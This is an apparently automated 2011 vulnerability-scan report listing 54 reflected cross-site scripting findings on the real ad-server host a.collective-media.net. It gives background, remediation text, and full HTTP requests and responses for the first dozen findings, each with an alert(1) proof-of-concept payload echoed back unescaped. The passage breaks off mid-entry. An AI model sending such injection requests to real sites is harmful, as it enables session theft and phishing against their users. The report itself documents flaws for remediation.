XSS, Ad CDN, a.collective-media.net, CWE-79, Cross Site Scripting

XSS in Ad CDN Host a.collective-media.net | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 08:37:34 CST 2011.

DORK CWE-79 XSS Report


1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.wgntv/ [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/iblocal.revinet.nyron/audience [REST URL parameter 1]

1.3. http://a.collective-media.net/ad/q1.wgn/be_ros [REST URL parameter 1]

1.4. http://a.collective-media.net/ad/q1.wgn/be_ros [REST URL parameter 1]

1.5. http://a.collective-media.net/adj/cm.wgntv/ [REST URL parameter 2]

1.6. http://a.collective-media.net/adj/cm.wgntv/ [name of an arbitrarily supplied request parameter]

1.7. http://a.collective-media.net/adj/cm.wgntv/ [sz parameter]

1.8. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 2]

1.9. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 3]

1.10. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [name of an arbitrarily supplied request parameter]

1.11. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 2]

1.12. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 3]

1.13. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [name of an arbitrarily supplied request parameter]

1.14. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [REST URL parameter 2]

1.15. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [REST URL parameter 3]

1.16. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [name of an arbitrarily supplied request parameter]

1.17. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [sz parameter]

1.18. http://a.collective-media.net/adj/q1.sarasota/be_life [REST URL parameter 2]

1.19. http://a.collective-media.net/adj/q1.sarasota/be_life [REST URL parameter 3]

1.20. http://a.collective-media.net/adj/q1.sarasota/be_life [name of an arbitrarily supplied request parameter]

1.21. http://a.collective-media.net/adj/q1.wgn/be_ros [REST URL parameter 2]

1.22. http://a.collective-media.net/adj/q1.wgn/be_ros [REST URL parameter 3]

1.23. http://a.collective-media.net/adj/q1.wgn/be_ros [name of an arbitrarily supplied request parameter]

1.24. http://a.collective-media.net/adj/q1.wgn/be_ros [sz parameter]

1.25. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 1]

1.26. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 2]

1.27. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 3]

1.28. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [name of an arbitrarily supplied request parameter]

1.29. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [sz parameter]

1.30. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 1]

1.31. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 2]

1.32. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 3]

1.33. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [name of an arbitrarily supplied request parameter]

1.34. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [sz parameter]

1.35. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 1]

1.36. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 2]

1.37. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 3]

1.38. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [name of an arbitrarily supplied request parameter]

1.39. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [sz parameter]

1.40. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 1]

1.41. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 2]

1.42. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 3]

1.43. http://a.collective-media.net/cmadj/q1.sarasota/be_life [name of an arbitrarily supplied request parameter]

1.44. http://a.collective-media.net/cmadj/q1.sarasota/be_life [sz parameter]

1.45. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 1]

1.46. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 2]

1.47. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 3]

1.48. http://a.collective-media.net/cmadj/q1.wgn/be_ros [name of an arbitrarily supplied request parameter]

1.49. http://a.collective-media.net/cmadj/q1.wgn/be_ros [sz parameter]

1.50. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [cli cookie]

1.51. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [cli cookie]

1.52. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [cli cookie]

1.53. http://a.collective-media.net/cmadj/q1.sarasota/be_life [cli cookie]

1.54. http://a.collective-media.net/cmadj/q1.wgn/be_ros [cli cookie]

1. Cross-site scripting (reflected)
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://a.collective-media.net/ad/cm.wgntv/ [REST URL parameter 1]  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.wgntv/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload de1ae<script>alert(1)</script>9df23d6f90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.


GET /adde1ae<script>alert(1)</script>9df23d6f90f/cm.wgntv/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 67
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:14 GMT
Connection: close

unknown path /adde1ae<script>alert(1)</script>9df23d6f90f/cm.wgntv/

1.2. http://a.collective-media.net/ad/iblocal.revinet.nyron/audience [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67ca2<script>alert(1)</script>6f869d734ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.


GET /ad67ca2<script>alert(1)</script>6f869d734ee/iblocal.revinet.nyron/audience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 88
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:16 GMT
Connection: close

unknown path /ad67ca2<script>alert(1)</script>6f869d734ee/iblocal.revinet.nyron/audience

1.3. http://a.collective-media.net/ad/q1.wgn/be_ros [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /ad/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 51a09(a)7712b8da71c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /ad51a09(a)7712b8da71c/q1.wgn/be_ros;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9b/3/0/%2a/d%3B211497745%3B0-0%3B2%3B36414418%3B3454-728/90%3B30079181/30097058/1%3Bu%3Dhttp%3A//www.wgntv.com/business/sns-ap-us-obit-daniel-bell%2C0%2C4200211.story%3B%7Eokv%3D%3B%3Bptype%3Dsbrd%3Bslug%3Dsns-ap-us-obit-daniel-bell%3Bpos%3DTbrd%3Bdcopt%3Dist%3Bsz%3D728x90%3Btile%3D1%3Bca%3DPolitics%3Ben%3DNewYork%3Bat%3DPolitics%3Bat%3DPhilosophy%3Bat%3DArtsandCulture%3Bat%3DCulture%3Bat%3DSociety%3Bu%3Dhttp%3A//www.wgntv.com/business/sns-ap-us-obit-daniel-bell%2C0%2C4200211.story%3B%7Eaopt%3D2/0/9c06/0%3B%7Esscs%3D%3f;ord=4273326?\ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 655
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:18 GMT
Connection: close

unknown path /ad51a09(a)7712b8da71c/q1.wgn/be_ros;cmw=owl;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9b/3/0/%2a/d%3B211497745%3B0-0%3B2%3B36414418%3B3454-728/90%3B30079181/30097058/1%3Bu%3Dhttp%3A//www.wgntv.com/busines

1.4. http://a.collective-media.net/ad/q1.wgn/be_ros [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8c52<script>alert(1)</script>ccaa7df99ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.


GET /adb8c52<script>alert(1)</script>ccaa7df99ab/q1.wgn/be_ros HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 71
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:16 GMT
Connection: close

unknown path /adb8c52<script>alert(1)</script>ccaa7df99ab/q1.wgn/be_ros

1.5. http://a.collective-media.net/adj/cm.wgntv/ [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.wgntv/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9029c'-alert(1)-'894aec0918d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/cm.wgntv9029c'-alert(1)-'894aec0918d/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 411
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:12:59 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:12:59 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.wgntv9029c'-alert(1)-'894aec0918d/;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.6. http://a.collective-media.net/adj/cm.wgntv/ [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.wgntv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2d86'-alert(1)-'8f361c21b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/cm.wgntv/?d2d86'-alert(1)-'8f361c21b84=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 414
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:12:58 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:12:58 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.wgntv/?d2d86'-alert(1)-'8f361c21b84=1;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.7. http://a.collective-media.net/adj/cm.wgntv/ [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.wgntv/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14ca4'-alert(1)-'e566335fdd1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/cm.wgntv/;sz=160x600;ord=4238388?\14ca4'-alert(1)-'e566335fdd1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 436
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:12:55 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:12:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.wgntv/;sz=160x600;net=cm;ord=4238388?\14ca4'-alert(1)-'e566335fdd1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.8. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bef0'-alert(1)-'3f48aea91d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress6bef0'-alert(1)-'3f48aea91d8/atfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress6bef0'-alert(1)-'3f48aea91d8/atfaudience;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.9. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76ef5'-alert(1)-'54cb8284996 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress/atfaudience76ef5'-alert(1)-'54cb8284996 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience76ef5'-alert(1)-'54cb8284996;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.10. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/atfaudience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29002'-alert(1)-'5dee625e72b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress/atfaudience?29002'-alert(1)-'5dee625e72b=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:01 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:01 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience?29002'-alert(1)-'5dee625e72b=1;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.11. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6af2e'-alert(1)-'2234163b479 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress6af2e'-alert(1)-'2234163b479/btfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:04 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress6af2e'-alert(1)-'2234163b479/btfaudience;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.12. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8be83'-alert(1)-'2314c0678ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress/btfaudience8be83'-alert(1)-'2314c0678ad HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:05 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:05 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience8be83'-alert(1)-'2314c0678ad;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.13. http://a.collective-media.net/adj/iblocal.journalreg.midtownpress/btfaudience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

